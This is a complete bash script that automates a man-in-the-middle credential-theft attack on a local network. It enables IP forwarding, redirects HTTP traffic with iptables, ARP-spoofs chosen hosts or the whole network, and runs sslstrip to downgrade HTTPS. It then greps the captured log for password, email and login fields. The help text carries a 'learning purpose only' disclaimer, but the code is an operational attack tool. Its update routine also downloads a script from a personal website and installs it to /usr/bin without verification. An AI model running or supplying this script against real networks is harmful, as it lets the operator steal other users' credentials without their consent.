#!/bin/bash
# Little bash script to launch man it the middle attack and sslstrip.
# version 0.6 by comaX
PROGNAME=$(basename $0)
VERSION="0.6.2"
#Let's define some arguments that can be passed to the script :
args=
while [ $# -ge 1 ] #check parameters
do
case $1 in
-h | --help) #define help message
clear
echo -e "You are running $0, version $VERSION.
usage : $0 [-h | --help] | [-u | --upadte]
-h or --help : displays this help message, disclaimer and exit.
-u or --update updates and installs this script
\033[31m DISCLAIMER :\033[m
This program is intended for learning purpose only. I do not condone hacking
and wouldn't be held responsible for you actions. Only you would face legal
consequences if you used this script for illegal activities.
\033[31m What I think should be learnt from this script :\033[m
This script should teach you how easy it is to steal sensitive online
credential and how to protect you from it, provided you understand
what this program does. The best way to understand what it does is
to look at its source. This will also teach you very basic shell script
programming.
\033[31m Changelog :\033[m
added in v0.6
-Support for multiple targets
added in v0.5 :
-Parameters for this great help message and update, more comments.
-Minor improvments
added in v0.4 :
-User friendly case insensitive answers (Y/y)
-Option to map network, retrieving live hosts and their dns names
-Minor improvments
\033[31m Credits :\033[m
Credits goes to all people on backtrack forums for their help and support,
and google for being my best friend with scripting.
Please criticize this program or submit ideas on the official thread at
http://tiny.cc/mitmautomate or send me a mail at cyprien.bl@gmail.com"
exit ;;
-u | --update) #update program
echo "This will download the last version from official website, and then install it to /usr/bin/mitm. Program will then exit and reload new version. In next uses you will only have to issue 'mitm' from your console. Do you wish to proceed ? (Y/N)"
read -e proceed
if [[ $proceed = "y" || $proceed = "Y" ]] ; then
wget http://comax.pagesperso-orange.fr/mitm.sh -O /tmp/mitm_update.sh #download most recent version to temp file
cp /tmp/mitm_update.sh /usr/bin/mitm #copy it to /usr/bin
rm /tmp/mitm_update.sh #delete temp file
echo -e "\033[32m Script updated ! Restarting to updated version...\033[m"
sleep 3
chmod +x /usr/bin/mitm #make newly installed script executable
/usr/bin/mitm #launch new script
else echo -e "\033[31m Update aborted.\033[m Continuing with this version (you are using $0)." & sleep 2
fi ;;
*) echo "Invalid parameters, coninuing with script $0" & sleep 2 ;;
esac
shift
done
clear
echo -e "===========================================================================
=\033[31m Welcome to MITM automation tool. Use this tool responsibly, and enjoy !\033[m =
= Feel free to contribute, and distribute this script as you please. =
= Official thread : http://tiny.cc/mitmautomate =
= Check out the help (-h) to see new features and informations =
= You are running version $VERSION. =
==========================================================================="
echo
echo
# Starting fresh : reset ip forward and iptables
echo -e "\033[31m [+] Cleaning iptables \033[m"
echo "[-] Cleaned."
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
# Defining exit function and other ending features
cleanup() {
echo
echo "[+] Killing processes and resetting iptable."
kill ${sslstripid}
killall arpspoof
echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
iptables --flush # there are probably too many resets here,
iptables --table nat --flush # but at least we're sure everything's clean
iptables --delete-chain
iptables --table nat --delete-chain
echo "[+] Clean up successful..."
echo -e "\033[31m [+] Let's have a look at sniffed passwords... \033[m" #Displaying results
echo -e "\033[37m (Will be blank if no passwords were found) \033[m"
egrep --color -i "&pwd=|&pass=|&passwd=|&password=|&textbox=|&email=|&user=|&login=" /tmp/$filename.txt #colorize all search terms when found
echo
echo "Do you want to keep log file for further use or shall we delete it ? (Y=keep)"
echo "If you want to keep it, it will be stored in /root/$filename.txt"
read -e keep
if [[ $keep = "Y" || $keep = "y" ]] ; then # double brackets because double condition. || signifies "or"
mv /tmp/$filename.txt /root/$filename.txt #moving file
if [ -f "/root/$filename.txt" ]; then #check if it exists
echo "Log file copied !" #it does
else echo "Error while copying log file. Go check /tmp/ for $filename.txt" #it does not
fi
else rm /tmp/$filename.txt #removing temp file
echo "All logs deleted"
fi
if [ -f "/usr/bin/mitm" ]; then #check if script is already installed
echo
echo
exit 1 #if yes, exit.
else
echo "This script is not installed yet. Do you wish to install it, so that you can reuse it later on by simply issuing 'mitm' in console ? (Y/N)" #if no, ask.
read -e install
if [[ $install = "Y" || $install="y" ]] ; then
cp ./mitm.sh /usr/bin/mitm #copy and rename script
echo -e "\033[32m Script installed !\033[m"
else echo "Script not installed."
fi
fi
exit
}
###############################End of functions#############################
# IP forwarding
echo
echo -e "\033[31m [+] Activating ip forwarding... \033[m"
echo "1" > /proc/sys/net/ipv4/ip_forward
echo "[-] Activated."
#Iptables
echo
echo -e "\033[31m [+] Configuring iptables... \033[m"
echo -en "\033[31m To \033[mwhat port should the traffic be redirected to ? (generally 10000)"
echo
read -e outport
echo -en "\033[31m From \033[mwhat port should the traffic be redirected to ? (generally 80)"
echo
read -e inport
echo -e "\033[33m Traffic from port $inport will be redirected to port $outport \033[m"
iptables -t nat -A PREROUTING -p tcp --destination-port $inport -j REDIRECT --to-port $outport
echo "[-] Traffic rerouted"
#Arpspoofing
echo
echo -e "\033[31m [+] Activating arpspoofing... \033[m"
echo
ip route show | grep ^default #ip route show, minimized to line begining with "default" : this is the one we need.
echo
echo "Enter gateway ip adress (as shown above) :"
read -e gateway
echo
echo "What interface would you like to use ? (it should match gateway ip as shown above)"
read -e iface
echo
echo "Would you like to target multiple (or single) targets or the whole network ? (Y=whole, N=single/multiple)"
read -e choicearp
echo
if [[ $choicearp = "N" || $choicearp = "n" ]] ; then
echo
echo -e "Do you want to map network to show live hosts ? (Y/N) [This might take up to 30 secs, be patient]"
read -e hosts
echo -e "\033[31m "
if [[ $hosts = "Y" || $hosts = "y" ]] ; then
fping -anA -q -g $gateway/24 -r 0 &> /tmp/hosts.txt #search for live hosts, displaying ip and dns name and write to file to avoid 255 lines showing up
grep -v "ICMP" /tmp/hosts.txt # display all lines not containing "ICMP" (error lines, dead hosts)
rm /tmp/hosts.txt # remove temporary file
echo -e "\033[m " # switch color back to white
else echo -e "\033[m "
fi
echo -e "You can select up to 6 ip adresses. Just enter them one after another when prompted.\033[31m Beware ! This will spawn as many windows as input targets and might slow down performances. If that was the case, then use whole network tageting.\033[m "
arpspoofi() {
xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $1 $gateway 2>/dev/null & sleep 2
if [[ "$2" > "0" ]] ; then
xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $2 $gateway 2>/dev/null & sleep 2
else echo
fi
if [[ "$3" > "0" ]] ; then
xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $3 $gateway 2>/dev/null & sleep 2
else echo
fi
if [[ "$4" > "0" ]] ; then
xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $4 $gateway 2>/dev/null & sleep 2
else echo
fi
if [[ "$5" > "0" ]] ; then
xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $5 $gateway 2>/dev/null & sleep 2
else echo
fi
if [[ "$6" > "0" ]] ; then
xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $6 $gateway 2>/dev/null & sleep 2
else echo
fi
t1=$1
t2=$2
t3=$3
t4=$4
t5=$5
t6=$6
}
echo "Enter ip adresses"
read -e parameters
arpspoofi $parameters
echo -e "\033[33m Targeting $t1 $t2 $t3 $t4 $t5 $t6 on $gateway on $iface\033[m"
echo -e "[-] Arp spoofing is launched. \033[31m Keep new windows running. \033[m"
elif [[ $choicearp = "Y" || $choicearp = "y" ]] ; then
xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface $gateway & arpspoofid=$!
sleep 2
echo -e "\033[33m Targeting the whole network on $gateway on $iface\033[m"
echo -e "[-] Arp spoofing is launched. \033[31m Keep new window running. \033[m"
else echo "Your choice is invalid. Quitting."
cleanup
fi
#Sslstrip
echo
echo -e "\033[31m [+] Activating sslstrip... \033[m"
echo "Choose filename to output :"
read -e filename
sslstrip -f -a -k -l $outport -w /tmp/$filename.txt & sslstripid=$! #output log to temp file
sleep 2 #let time for sslstrip to launch. You may want to increase this time on slower machines
echo
echo -e "\033[33m Sslstrip will be listening on port $outport and outputing log in /tmp/$filename.txt\033[m"
echo -e " [-] Sslstrip is running." # a bit redudant, but who cares ?
echo
echo -e "\033[37m Attack should be running smooth, enjoy.\033[m"
echo
echo -e "\033[33m To stop the attack, input 'quit' below :\033[m"
echo
read quitting
if [ $quitting = "quit" ] ; then
cleanup
else echo "Bad choice. Enter quit to stop attack"
read -e quitting
if [ $quitting = "quit" ] ; then
cleanup
else echo "Bad choice. Enter quit to stop attack"
read -e quitting
if [ $quitting = "quit" ] ; then
cleanup
else echo "Bad choice. Enter quit to stop attack"
read -e quitting
if [ $quitting = "quit" ] ; then
cleanup
else echo "Bad choice. Enter quit to stop attack"
echo
echo -e "\033[31mNOW YOU'RE JUST BEING A FUCKING DOUCHE. QUITTING.\033[m" #I'm having fun here
cleanup
fi
fi
fi
fi